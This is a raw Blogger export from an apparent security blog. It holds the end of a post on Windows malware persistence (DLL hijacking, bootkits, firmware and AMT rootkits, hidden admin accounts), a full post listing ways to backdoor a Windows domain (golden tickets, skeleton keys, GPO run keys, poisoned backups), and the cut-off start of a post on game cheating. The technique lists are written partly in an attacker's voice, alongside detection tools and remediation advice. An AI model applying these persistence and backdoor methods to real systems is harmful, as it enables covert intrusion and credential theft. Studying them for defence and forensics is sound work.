<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQrmUznu3zBiK_JfjnoIkV36r81wbbZQehM1_j1511K3pgJuXoBEDMrOkdm4UjJblbQnv9N7tx0jk3ZBDkJyorM93y0hYYum0SZPnw_yr1OANiP-W7GUKAJhrKljMBzJgj5Kc6UPxHc4Z-/s1600/certs.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img align="middle" border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQrmUznu3zBiK_JfjnoIkV36r81wbbZQehM1_j1511K3pgJuXoBEDMrOkdm4UjJblbQnv9N7tx0jk3ZBDkJyorM93y0hYYum0SZPnw_yr1OANiP-W7GUKAJhrKljMBzJgj5Kc6UPxHc4Z-/s1600/certs.png" width="318" /></a></td></tr>
<tr><td style="text-align: center;"></td></tr>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhdpoS8HZ-FaKX5N5zAgrQXEXmM20PkxCFVxEsmLFs9m5eQv__pjOTIzo5IEDp7f8RSbV5yPyu9RobPD8ZEJd-G2aUGLb7qs5Wk6SdmIiDfrk-P6ELRriObacXwBNztvrlS85KDXU79ZCU0/s1600/cert2.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="72" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhdpoS8HZ-FaKX5N5zAgrQXEXmM20PkxCFVxEsmLFs9m5eQv__pjOTIzo5IEDp7f8RSbV5yPyu9RobPD8ZEJd-G2aUGLb7qs5Wk6SdmIiDfrk-P6ELRriObacXwBNztvrlS85KDXU79ZCU0/s1600/cert2.png" width="640" /></a></td></tr>
</tbody></table>
See, rootkit.exe totally looks legit, and it is filtered out when someone filters for "Hide Windows entries".<br />
<br />
<div>
<div style="text-align: justify;">
<span style="background-color: yellow;"><br /></span></div>
</div>
<div>
<h3>
</h3>
<h3 style="text-align: justify;">
Hijack DLL load order</h3>
</div>
<div>
<div style="text-align: justify;">
Just place your DLL into a directory which is searched before the original DLL is found, and PROFIT! But again, to avoid lame detection, be sure to proxy the legitimate function calls to the original DLL. A good source on this topic from <a href="https://www.mandiant.com/blog/dll-search-order-hijacking-revisited/" target="_blank">Mandiant</a> and <a href="http://digital-forensics.sans.org/blog/2015/03/25/detecting-dll-hijacking-on-windows/" target="_blank">DLL hijack detector</a>.<br />
<br /></div>
<div class="separator" style="clear: both; text-align: justify;">
</div>
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjq7M_bjoQopodYRB4EBdJE0YMMEhsYt5j1JH_NPJX3gYoU2yO_N66ZHoocuR443Rko1He6MyFYF7myCmqVh5E_b4PUkwjRVGsAs7Cq1IMaYB34BQX2eZ1F6hoLp-zZZRWxZqyR7wz6s4fR/s1600/dll-hijack-detector.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="261" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjq7M_bjoQopodYRB4EBdJE0YMMEhsYt5j1JH_NPJX3gYoU2yO_N66ZHoocuR443Rko1He6MyFYF7myCmqVh5E_b4PUkwjRVGsAs7Cq1IMaYB34BQX2eZ1F6hoLp-zZZRWxZqyR7wz6s4fR/s1600/dll-hijack-detector.jpg" width="400" /></a></td></tr>
</tbody></table>
<br />
Here you can see how PlugX works in action, by dropping a legitimate Kaspersky executable, and hijacking the DLL calls with their DLL. </div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhOF5a4wSeibVP_MzsWK7HwNX4i8YdFLqZpV7ubDrUQALyTsGH6_hmHXM-4HtBZgwl_zkj8YweH6pD3lhs7xfR3MmhCWpuzN2Eg38xRTULEB8Um5rfZvg-DvsZ04zCmD8Cs3UWH_05Ac1kN/s1600/Screen+Shot+2017-07-05+at+20.22.14.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="635" data-original-width="1405" height="288" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhOF5a4wSeibVP_MzsWK7HwNX4i8YdFLqZpV7ubDrUQALyTsGH6_hmHXM-4HtBZgwl_zkj8YweH6pD3lhs7xfR3MmhCWpuzN2Eg38xRTULEB8Um5rfZvg-DvsZ04zCmD8Cs3UWH_05Ac1kN/s640/Screen+Shot+2017-07-05+at+20.22.14.png" width="640" /></a></div>
<div>
<div style="text-align: justify;">
<br /></div>
</div>
<div>
<h3>
</h3>
<h3 style="text-align: justify;">
Hijack a shortcut from the desktop/start menu</h3>
<div style="text-align: justify;">
Never underestimate the power of lame tricks. Just create an executable which calls the original executable, and meanwhile starts your backdoor. Replace the link, PROFIT! And don't be a skiddie, check the icon ;) I have seen this trick in adware hijacking browsers a lot of times.<br />
<br /></div>
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgA2Fw3hc36c77SNAL1YML1cWJSAKcfOtmYAHAj6imMshaAUTjcAeX6ZNd1WuL2mAX03_FjoZblSxyW5K3iOSaUVYz89knTxFjYAlchsuqnnsizPYG9JispILhyF8X2bQRJeZihoALognV0/s1600/ie.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="373" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgA2Fw3hc36c77SNAL1YML1cWJSAKcfOtmYAHAj6imMshaAUTjcAeX6ZNd1WuL2mAX03_FjoZblSxyW5K3iOSaUVYz89knTxFjYAlchsuqnnsizPYG9JispILhyF8X2bQRJeZihoALognV0/s1600/ie.png" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">IE hijacked to start with http://tinyurl.com/2fcpre6</td></tr>
</tbody></table>
<div style="text-align: justify;">
<br /></div>
<h3>
</h3>
<h3>
</h3>
<h3 style="text-align: justify;">
File association hijack</h3>
</div>
<div>
<div style="text-align: justify;">
Choose the user's favorite file type, replace the program which handles the opening with a similar one described in the previous section, and voila!</div>
<div style="text-align: justify;">
<br /></div>
</div>
<h3>
</h3>
<h3 style="text-align: justify;">
COM object hijack</h3>
<div style="text-align: justify;">
The main idea is that some COM objects are scanned for whether they are on the system or not, and when it is registered, it is automatically loaded. See <a href="https://blog.gdatasoftware.com/blog/article/com-object-hijacking-the-discreet-way-of-persistence.html" target="_blank">COMpfun</a> for details.</div>
<div style="text-align: justify;">
<br /></div>
<h3 style="text-align: justify;">
</h3>
<h3 style="text-align: justify;">
Windows Application Compatibility - SHIM</h3>
<div style="text-align: justify;">
Not many people are familiar with Windows Application Compatibility and how it works. Think about it as an added layer between applications and the OS. If the application matches a certain condition (e.g. filename), certain actions will take place. E.g. emulation of directories, registry entries, DLL injection, etc. In my installation, there are 367 different compatibility fixes (type of compatibility "simulation"), and some of those can be customized.</div>
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj4NGX39oyWT6YJ2PsxTHgIQzRlnzlgUl-WLcNKva_IMDYmL03XQUE29iYhmd9s9W5J1len50X2fe-iMmb10UA1BPl4IuLrm6evylSJ0x2IWIcsAh23yjEk9ZcAF55XFUtmb54JAjTdmjji/s1600/sdb.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="158" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj4NGX39oyWT6YJ2PsxTHgIQzRlnzlgUl-WLcNKva_IMDYmL03XQUE29iYhmd9s9W5J1len50X2fe-iMmb10UA1BPl4IuLrm6evylSJ0x2IWIcsAh23yjEk9ZcAF55XFUtmb54JAjTdmjji/s1600/sdb.png" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Every time IE starts, inject a DLL into IE</td></tr>
</tbody></table>
<div style="text-align: justify;">
<br /></div>
<h2 style="text-align: justify;">
Bootkits </h2>
<div>
<div style="text-align: justify;">
Although bootkits shown here can end up in Autoruns in the drivers section (as they might need a driver at the end of the day), I still think it deserves a different section.<br />
<br /></div>
</div>
<div>
<h3 style="text-align: justify;">
MBR - Master boot record</h3>
<div style="text-align: justify;">
Malware can overwrite the Master boot record, start the boot process with its own code, and continue the boot process with the original one. It is common for rootkits to fake the content of the MBR record, and show the original contents. Which means one just have attached the infected HDD to a clean system, and compare the first 512 bytes (or more in some cases) with a known, clean state, or compare it to the contents shown from the infected OS. SecureBoot can be used to prevent malware infections like this.</div>
</div>
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEicjMNgWdKRpGhmURUKef1dd06RvHvf0SezQ-gkZ27gNLX0kyw2Z-30rah2oEavuQdQCuHMSbTuZT65KGlc-FxH6N9MmJ9t4B8XfUtWhdVqxBsz-CLCYGUL6nTaj6ErEo7St2p6r00Tqa4y/s1600/mbr.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="129" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEicjMNgWdKRpGhmURUKef1dd06RvHvf0SezQ-gkZ27gNLX0kyw2Z-30rah2oEavuQdQCuHMSbTuZT65KGlc-FxH6N9MmJ9t4B8XfUtWhdVqxBsz-CLCYGUL6nTaj6ErEo7St2p6r00Tqa4y/s1600/mbr.png" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="font-size: 13px;">There is a slight difference when MBR is viewed from infected OS vs clean OS</td></tr>
</tbody></table>
<h3 style="text-align: justify;">
VBR - Volume boot record</h3>
<div style="text-align: justify;">
This is the next logical step where malware can start it's process, and some malware/rootkit prefers to hide it's startup code here. Check <a href="http://arstechnica.com/security/2015/02/how-omnipotent-hackers-tied-to-the-nsa-hid-for-14-years-and-were-found-at-last/1/" target="_blank">GrayFish </a>for details. SecureBoot can be used to prevent malware infections like this.<br />
<br /></div>
<h3 style="text-align: justify;">
BIOS/UEFI malware</h3>
<div>
<div style="text-align: justify;">
Both the old BIOS and the new UEFI can be modified in a way that malware starts even before the OS had a chance to run. Although UEFI was meant to be more secure than BIOS, implementation and design errors happens. Check the<a href="http://securelist.com/analysis/publications/58278/absolute-computrace-revisited/" target="_blank"> Computrace anti-theft rootkit</a> for details.<br />
<br /></div>
<h3>
</h3>
<h3 style="text-align: justify;">
</h3>
<h3 style="text-align: justify;">
Hypervisor - Ring -1 rootkit</h3>
</div>
<h3>
</h3>
<div style="text-align: justify;">
This is somewhat special, because I believe although rootkit can run in this layer but it can't persist only in this layer on an average, physical machine, because it won't survive a reboot <a href="http://blackhat.com/presentations/bh-usa-06/BH-US-06-Rutkowska.pdf" target="_blank">See Rutkowska's presentation from 2006</a> But because the hypervisor can intercept the restart event, it can write itself into one of the other layers (e.g. install a common kernel driver), and simply delete it after it is fully functional after reboot. Update: There is a good paper from Igor Korkin about hypervisor detection <a href="http://igorkorkin.blogspot.ru/2015/05/two-challenges-of-stealthy-hypervisors.html" target="_blank">here</a>.<br />
<br /></div>
<h3 style="text-align: justify;">
</h3>
<h3 style="text-align: justify;">
SMM (System Management Mode) malware - Ring -2 rootkit</h3>
<div>
<div style="text-align: justify;">
Somehow related to the previous type of attacks, but not many people know that <a href="http://en.wikipedia.org/wiki/System_Management_Mode#Problems" target="_blank">System Management Mode can be used to inject code into the OS</a>. Check the DEITYBOUNCE malware for more details ;) Also, abusing <a href="https://www.acsac.org/2014/workshops/mmf/Tamas%20Lengyel-Pitfalls%20of%20virtual%20machine%20introspection%20on%20modern%20hardware.pdf" target="_blank">Intel Dual Monitor Mode (DMM)</a> can lead to untrusted code execution, which basically monitors the SMM mode.</div>
<div style="text-align: justify;">
<br /></div>
<h3>
</h3>
<h3 style="text-align: justify;">
Intel® Active Management Technology - Ring -3 rootkit</h3>
</div>
<div>
<div style="text-align: justify;">
According to Wikipedia, "Intel Active Management Technology (AMT) is hardware and firmware technology for remote out-of-band management of personal computers, in order to monitor, maintain, update, upgrade, and repair them". You can ask, what could possibly go wrong? See <a href="http://invisiblethingslab.com/resources/bh09usa/Ring%20-3%20Rootkits.pdf" target="_blank">Alexander Tereshkin's and Rafal Wojtczuk's great research</a> on this, or <a href="http://people.kth.se/~maguire/DEGREE-PROJECT-REPORTS/100402-Vassilios_Ververis-with-cover.pdf" target="_blank">Vassilios Ververis thesis about AMT</a>. </div>
<div style="text-align: justify;">
As not many people click on links, let me quote the scary stuff about AMT:</div>
</div>
</div>
<div>
<div>
<ul>
<li style="text-align: justify;">Independent of the main CPU</li>
<li style="text-align: justify;">Can access host memory via DMA (with restrictions)</li>
<li style="text-align: justify;">Dedicated link to NIC, and its filtering capabilities</li>
<li style="text-align: justify;">Can force host OS to reboot at any time (and boot the system from the emulated CDROM)</li>
<li style="text-align: justify;">Active even in S3 sleep!</li>
</ul>
</div>
<div>
<div style="text-align: justify;">
<br /></div>
<h2>
</h2>
<h2 style="text-align: justify;">
Other stuff</h2>
<h3>
</h3>
<h3 style="text-align: justify;">
</h3>
<h3 style="text-align: justify;">
Create new user, update existing user, hidden admins</h3>
</div>
<div>
<div style="text-align: justify;">
Sometimes one does not even have to add malicious code to the system, as valid user credentials are more than enough. Either existing users can be used for this purpose, or new ones can be created. E.g. a good trick is to use the Support account with a 500 RID - see <a href="http://xangosec.blogspot.com/2013/06/trojanizing-windows.html" target="_blank">here</a>, Metasploit tool <a href="https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/manage/enable_support_account.rb" target="_blank">here</a>.<br />
<br /></div>
</div>
<h3>
</h3>
<h3 style="text-align: justify;">
</h3>
<h3 style="text-align: justify;">
Esoteric firmware malware</h3>
<div style="text-align: justify;">
Almost any component in the computer runs with firmware, and by replacing the firmware with a malicious one, it is possible to start the malware. E.g. HDD firmware (see <a href="http://arstechnica.com/security/2015/02/how-omnipotent-hackers-tied-to-the-nsa-hid-for-14-years-and-were-found-at-last/1/" target="_blank">GrayFish </a>again), graphic card, etc.<br />
<br /></div>
<h3 style="text-align: justify;">
</h3>
<h3 style="text-align: justify;">
Hidden boot device</h3>
<div style="text-align: justify;">
Malware can hide in one of the boot devices which are checked before the average OS is loaded, and after the malware is loaded, it can load the victim OS.<br />
<br /></div>
<h3 style="text-align: justify;">
</h3>
<h3>
Network-level backdoor</h3>
<div style="text-align: justify;">
Think about the following scenario: every time the OS boots, it loads additional data from the network. It can check for new software updates, configuration updates, etc. Whenever a vulnerable software/configuration update, the malware injects itself into the response, and get's executed. I know, this level of persistence is not foolproof, but still, possible. Think about the recently discovered <a href="https://labs.mwrinfosecurity.com/blog/2015/04/02/how-to-own-any-windows-network-with-group-policy-hijacking-attacks/" target="_blank">GPO MiTM attack</a>, the <a href="https://github.com/infobyte/evilgrade" target="_blank">Evilgrade</a> tool, or even the <a href="https://www.blackhat.com/presentations/bh-dc-08/Oberheide/Whitepaper/bh-dc-08-oberheide-WP.pdf" target="_blank">Xensploit</a> tool when we are talking about VM migration.<br />
<br /></div>
<h3 style="text-align: justify;">
</h3>
<h3 style="text-align: justify;">
Software vulnerability</h3>
<div style="text-align: justify;">
Almost any kind of software vulnerability can be used as a persistent backdoor. Especially, if the vulnerability can be accessed remotely via the network, without any user interaction. Good old MS08-067...<br />
<br /></div>
<h3>
</h3>
<h3 style="text-align: justify;">
Hardware malware, built into the chipset</h3>
<div style="text-align: justify;">
I am not sure what to write here. Ask your local spy agency for further information. Good luck finding those!<br />
<br /></div>
<h3 style="text-align: justify;">
</h3>
<h3 style="text-align: justify;">
More links</h3>
<div>
Tools I highly recommend:</div>
<div>
<ul>
<li><a href="https://technet.microsoft.com/en-us/sysinternals/bb545027.aspx" target="_blank">Sysinternals Autoruns</a></li>
<li><a href="http://www.gmer.net/" target="_blank">GMER</a></li>
<li><a href="http://digital-forensics.sans.org/blog/2015/03/25/detecting-dll-hijacking-on-windows/" target="_blank">DLL hijack detector</a></li>
<li>PCHunter</li>
<li><a href="https://www.mandiant.com/resources/download/redline" target="_blank">Mandiant Redline</a></li>
<li><a href="https://github.com/volatilityfoundation" target="_blank">Volatility</a></li>
<li><a href="https://github.com/davehull/Kansa/" target="_blank">Kansa</a></li>
</ul>
</div>
<div style="text-align: justify;">
For more information, check this blog post, <a href="http://blog.cylance.com/windows-registry-persistence-part-1-introduction-attack-phases-and-windows-services" target="_blank">part 1</a>, <a href="http://blog.cylance.com/windows-registry-persistence-part-2-the-run-keys-and-search-order" target="_blank">part 2</a><br />
<br />
Update 2017-04-29: A very nice list of Office persistence: <a href="https://labs.mwrinfosecurity.com/blog/add-in-opportunities-for-office-persistence/">https://labs.mwrinfosecurity.com/blog/add-in-opportunities-for-office-persistence/</a><br />
<br />
Update 2017-10-23: Persistence via Security Descriptors and ACLs: <a href="https://www.youtube.com/watch?v=SeR4QJbaNRg">https://www.youtube.com/watch?v=SeR4QJbaNRg</a><br />
<br />
Update 2018-07-25: Backdooring LAPS <a href="https://rastamouse.me/2018/03/laps---part-1/">https://rastamouse.me/2018/03/laps---part-1/</a><br />
<a href="https://rastamouse.me/2018/03/laps---part-2/" target="_blank">https://rastamouse.me/2018/03/laps---part-2/ </a><br />
<br />
I would like to thank to Gabor Pek from CrySyS Lab for reviewing and completing this post.</div>
</div>
</div>
Zhttp://www.blogger.com/profile/12373001166765443215noreply@blogger.com9tag:blogger.com,1999:blog-7429675726481888518.post-29966826301847538802015-03-05T22:04:00.000+01:002019-10-08T15:40:29.315+02:00Thousand ways to backdoor a Windows domain (forest)<div style="text-align: left;">
<div style="text-align: justify;">
When the Kerberos elevation of privilege (CVE-2014-6324 / MS14-068) vulnerability has been made public, the remediation paragraph of the following blog post made some waves:<br />
<a href="http://blogs.technet.com/b/srd/archive/2014/11/18/additional-information-about-cve-2014-6324.aspx">http://blogs.technet.com/b/srd/archive/2014/11/18/additional-information-about-cve-2014-6324.aspx</a><br />
<br />
"The only way a domain compromise can be remediated with a high level of certainty is a complete rebuild of the domain."<br />
<br />
Personally, I agree with this, but .... But whether this is the real solution, I'm not sure. And the same applies to compromised computers. When it has been identified that malware was able to run on the computer (e.g. scheduled scan found the malware), there is no easy way to determine with 100% certainty that there is no rootkit on the computer. Thus rebuilding the computer might be a good thing to consider. For paranoids, use new hardware ;)<br />
<br />
But rebuilding a single workstation and rebuilding a whole domain is not on the same complexity level. Rebuilding a domain can take weeks or months (or years, which will never happen, as the business will close before that).<br />
<br />
There are countless documented methods to backdoor a computer, but I have never seen a post where someone collects all the methods to backdoor a domain. In the following, I will refer to domain admin, but in reality, I mean Domain Admins, Enterprise Admins, and Schema Admins.<br />
<br />
<br />
<h3>
Ways to backdoor a domain</h3>
So here you go, an incomplete list to backdoor a domain:<br />
<br />
<ul>
<li>Create a new domain admin user. Easy to do, easy to detect, easy to remediate</li>
<li>Dump password hashes. The attacker can either crack those or just pass-the-hash. Since KB2871997, pass-the-hash might be trickier (<a href="https://technet.microsoft.com/library/security/2871997">https://technet.microsoft.com/library/security/2871997</a>), but not impossible. Easy to do, hard to detect, hard to remediate - just think about service user passwords. And during remediation, consider all passwords compromised, even strong ones.</li>
<li>Logon scripts - modify the logon scripts and add something malicious in it. Almost anything detailed in this post can be added :D</li>
<li>Use an already available account, and add domain admin privileges to that. Reset its password. Mess with current group memberships - e.g. <a href="http://www.exploit-db.com/papers/17167/">http://www.exploit-db.com/papers/17167/</a></li>
<li>Backdoor any workstation where domain admins login. While remediating workstations, don't forget to clean the roaming profile. The type of backdoor can use different forms: malware, local admin, password (hidden admin with 500 RID), sticky keys, etc.</li>
<li>Backdoor any domain controller server. For advanced attacks, see <a href="https://github.com/gentilkiwi/mimikatz/releases/tag/2.0.0-alpha-20150117" target="_blank">Skeleton keys </a></li>
<li>Backdoor files on network shares which are commonly used by domain admins by adding malware to commonly used executables - <a href="https://github.com/secretsquirrel/the-backdoor-factory" target="_blank">Backdoor factory</a></li>
<li>Change ownership/permissions on AD partitions - if you have particular details on how to do this specifically, please comment</li>
<li>Create a new domain user. Hide admin privileges with SID history. Easy to do, hard to detect, easy to remediate - check <a href="https://github.com/gentilkiwi/mimikatz" target="_blank">Mimikatz </a>experimental for addsid</li>
<li><a href="http://rycon.hu/papers/goldenticket.html" target="_blank">Golden tickets</a> - easy to do, hard to detect, medium remediation</li>
<li><a href="http://www.beneaththewaves.net/Projects/Mimikatz_20_-_Silver_Ticket_Walkthrough.html" target="_blank">Silver tickets</a> - easy to do, hard to detect, medium/hard remediation</li>
<li>Backdoor workstations/servers via group policy</li>
<ul>
<li>HKEY_LOCAL_MACHINE\ Software\ Microsoft\ Windows\ CurrentVersion\ RunOnce,</li>
<li>scheduled tasks (run task 2 years later),</li>
<li><a href="http://www.labofapenetrationtester.com/2012/05/fun-with-sticky-keys-utilman-and.html" target="_blank">sticky-keys with debug</a></li>
</ul>
<li><a href="https://www.youtube.com/watch?v=Mz9Bg9KAKBs" target="_blank">Backdoor patch management tool</a>, see <a href="https://www.trustedsec.com/files/Owning_One_Rule_All_v2.pdf" target="_blank">slides here</a></li>
</ul>
<div>
[Update 2017.01.10]</div>
<ul>
<li>Assign <a href="http://www.harmj0y.net/blog/activedirectory/the-most-dangerous-user-right-you-probably-have-never-heard-of/" target="_blank">SeEnableDelegationPrivilege</a> to a user </li>
<li><a href="https://adsecurity.org/?p=1714" target="_blank">Directory Service Restore Mode (DSRM)</a></li>
<li><a href="https://adsecurity.org/?p=1760" target="_blank">Malicious Security Support Provider (SSP)</a></li>
<li><a href="https://adsecurity.org/?p=1785" target="_blank">DSRMv2</a></li>
<li><a href="https://adsecurity.org/?p=1906" target="_blank">AdminSDHolder</a></li>
<li><a href="https://adsecurity.org/?p=2716" target="_blank">Edit GPO</a> </li>
</ul>
<br />
<br />
<h3>
Other tricks</h3>
The following list does not fit in the previous "instant admin" tips, but still, it can make the attackers life easier if their primary foothold has been disabled:<br />
<br />
<ul>
<li>Backdoor recent backups - and when the backdoor is needed, destroy the files, so the files will be restored from the backdoored backup</li>
<li>Backdoor the Exchange server - get a copy of emails</li>
<li>Backdoor workstation/server golden image</li>
<li>Change permission of logon scripts to allow modification later</li>
<li>Place malicious symlinks to file shares, collect hashes via SMB auth tries on specified IP address, grab password hashes later</li>
<li>Backdoor remote admin management e.g. HP iLO - e.g. create new user or steal current password</li>
<li>Backdoor files e.g. on shares to use in SMB relay</li>
<li>Backdoor source code of in-house-developed software</li>
<li>Use any type of sniffed or reused passwords in new attacks, e.g. network admin, firewall admin, VPN admin, AV admin, etc.</li>
<li>Change the content of the proxy pac file (change browser configuration if necessary), including special exception(s) for a chosen domain(s) to use proxy on malicious IP. Redirect the traffic, enforce authentication, grab password hashes, ???, profit.</li>
<li>Create high privileged users in applications running with high privileges, e.g. MSSQL, Tomcat, and own the machine, impersonate users, grab their credentials, etc. The typical pentest path made easy.</li>
<li>Remove patches from servers, change patch policy not to install those patches.</li>
<li>Steal Windows root/intermediate CA keys</li>
<li>Weaken AD security by changing group policy (e.g. re-enabling LM-hashes)</li>
</ul>
Update [2015-09-27]: I found this <a href="https://www.youtube.com/watch?v=w6761-NWmj4" target="_blank">great presentation</a> from Jakob Heidelberg. It mentions (at least) the following techniques, it is worth to check these:<br />
<ul>
<li>Microsoft Local Administrator Password Solution</li>
<li>Enroll virtual smart card certificates for domain admins</li>
</ul>
<br />
<h3>
Forensics</h3>
<div>
If you have been chosen to remediate a network where attackers gained domain admin privileges, well, you have a lot of things to look for :)</div>
<div>
<br /></div>
<div>
I can recommend two tools which can help you during your investigation:</div>
<div>
<br />
<ul>
<li><a href="http://blogs.microsoft.com/cybertrust/2013/06/03/microsoft-releases-new-mitigation-guidance-for-active-directory/" target="_blank">AD explorer tool to diff AD</a></li>
<li><a href="http://www.ntdsxtract.com/downloads/ntdsxtract/ntds_forensics.pdf" target="_blank">NTDS forensics</a></li>
<li><a href="https://bitbucket.org/iwseclabs/bta" target="_blank">BTA</a> (thx to Sn0rkY)</li>
</ul>
<br />
<br /></div>
<h3>
Lessons learned</h3>
But guess what, not all of these problems are solved by rebuilding the AD. One has to rebuild all the computers from scratch as well. Which seems quite impossible. When someone is creating a new AD, it is impossible not to migrate some configuration/data/files from the old domain. And whenever this happens, there is a risk that the new AD will be backdoored as well.<br />
<br />
Ok, we are doomed, but what can we do? I recommend proper log analysis, analyze trends, and detect strange patterns in your network. Better spend money on these, than on the domain rebuild. And when you find something, do a proper incident response. And good luck!</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Ps: Thanks to Andrew, EQ, and Tileo for adding new ideas to this post.<br />
<br />
Check out the <a href="https://jumpespjump.blogspot.hu/2015/05/many-ways-of-malware-persistence-that.html" target="_blank">host backdooring</a> post as well! :)</div>
</div>
Zhttp://www.blogger.com/profile/12373001166765443215noreply@blogger.com4tag:blogger.com,1999:blog-7429675726481888518.post-5064678794481384942015-01-14T20:47:00.002+01:002019-10-08T15:45:26.866+02:00Hacking freemium games - the evolution of PC game cheating<div style="text-align: justify;">
This post is going to be a rather strange post compared to previous ones. But bear with me, in the middle of the post you will see why this post fits the IT security topic.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
I'm also terribly sorry for not posting recently, but I was busy with my <a href="http://www.securitytube-training.com/online-courses/securitytube-python-scripting-expert/" target="_blank">SPSE</a> and <a href="http://www.securitytube-training.com/online-courses/securitytube-linux-assembly-expert/index.html" target="_blank">SLAE</a> certification. Both are recommended for Python and Assembly noobs like me. But back to this post.<br />
<br /></div>
<h2 style="text-align: justify;">
A little bit of history</h2>
<div style="text-align: justify;">
Cheating in games started as help for game testers. By using invincibility or infinite ammo testers were able to test the game quicker, which meant less money spent on testing. I personally use cheat codes in games, depending on my mood. Sometimes it feels good to slash all the opponents while I'm invincible, sometimes it is more fun to play the game without cheats. One can argue whether cheating in games is OK or not, but I believe it depends, there is no black or white. But one thing is for sure, it is part of the gaming industry. There is huge demand for cheats. There were even cheat books printed on paper...</div>
<div style="text-align: justify;">
<br /></div>
<div align="justify">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgsaIjpO9BcHl5eFrSg5fwOSOzj2TdMSZ0w-7N-mqBRnYu05guCdIKQj-PWaPoFI_WQUH_k5hA0OwRn96LUTG4eZVLl88FIad6OmUS3yWL517lVW3PV0xezs7aPI-Ll2W-836roEVe0b6fu/s1600/cheats10.jpg" style="margin-left: 1em; margin-right: 1em;"><img align="justify" border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgsaIjpO9BcHl5eFrSg5fwOSOzj2TdMSZ0w-7N-mqBRnYu05guCdIKQj-PWaPoFI_WQUH_k5hA0OwRn96LUTG4eZVLl88FIad6OmUS3yWL517lVW3PV0xezs7aPI-Ll2W-836roEVe0b6fu/s1600/cheats10.jpg" width="228" /></a></div>
</div>
<div style="text-align: justify;">
<br /></div>
<h2 style="text-align: justify;">
The different types of cheats (on PC)</h2>
<div style="text-align: justify;">
There are different types of cheats in PC gaming. Following is a noncomplete list of these cheats:<br />
<br /></div>
<h3 style="text-align: justify;">
Cheat codes</h3>
<div style="text-align: justify;">
The good old IDDQD type of cheats. These are left in the game by the developers intentionally. Nothing interesting here.<br />
<br /></div>
<h3 style="text-align: justify;">
Edit memory</h3>
<div style="text-align: justify;">
This is my favorite. I will talk about this at the end of the post. Whenever a user launches a new program, the program's whole memory is accessible (read/write) to every other program launched by the user. And since the memory stores the current game state (health, ammo, armor, etc.), these values can be changed easily. In the good old times, there were <a href="http://ready64.it/articoli/_files/043_pokesc64.txt" target="_blank">POKE</a> commands to do this cheats, and the memory address to write into was published by people who found where the game stores the most critical states about the game.<br />
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgnNZyyWMLrhPAh7_G3oMykKPhxnA4IuAwPoxMA4R3HhyphenhyphenXVYujbCwhvtOeLbLMvp3Ern39HEWrtPO1SerxMeqCGtnHo3cw4LvLor9ixs8-h85kcGikeSLEskqc-8-1B5hI9DF4_7TRptK59/s1600/hqdefault.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgnNZyyWMLrhPAh7_G3oMykKPhxnA4IuAwPoxMA4R3HhyphenhyphenXVYujbCwhvtOeLbLMvp3Ern39HEWrtPO1SerxMeqCGtnHo3cw4LvLor9ixs8-h85kcGikeSLEskqc-8-1B5hI9DF4_7TRptK59/s1600/hqdefault.jpg" width="400" /></a></div>
<h3 style="text-align: justify;">
</h3>
<h3 style="text-align: justify;">
Code injection</h3>
<div style="text-align: justify;">
This is like patching the game code. For example, one can change the "DEC (pointer to your current health)" instruction with NOP (do nothing), thus becoming invincible. In multi-player cheats, there is the aimbot to help you aim at enemies, wallhack to see through the wall, increase hitbox of the enemy for smoother hit, or in MMORPGs, one can write macros to collect items while the player is not online. I would say the so-called "<a href="http://en.wikipedia.org/wiki/Trainer_(games)" target="_blank">trainers</a>" more or less fit into this category and the previous one.<br />
<br /></div>
<h3 style="text-align: justify;">
Saved game editor</h3>
<div>
<div style="text-align: justify;">
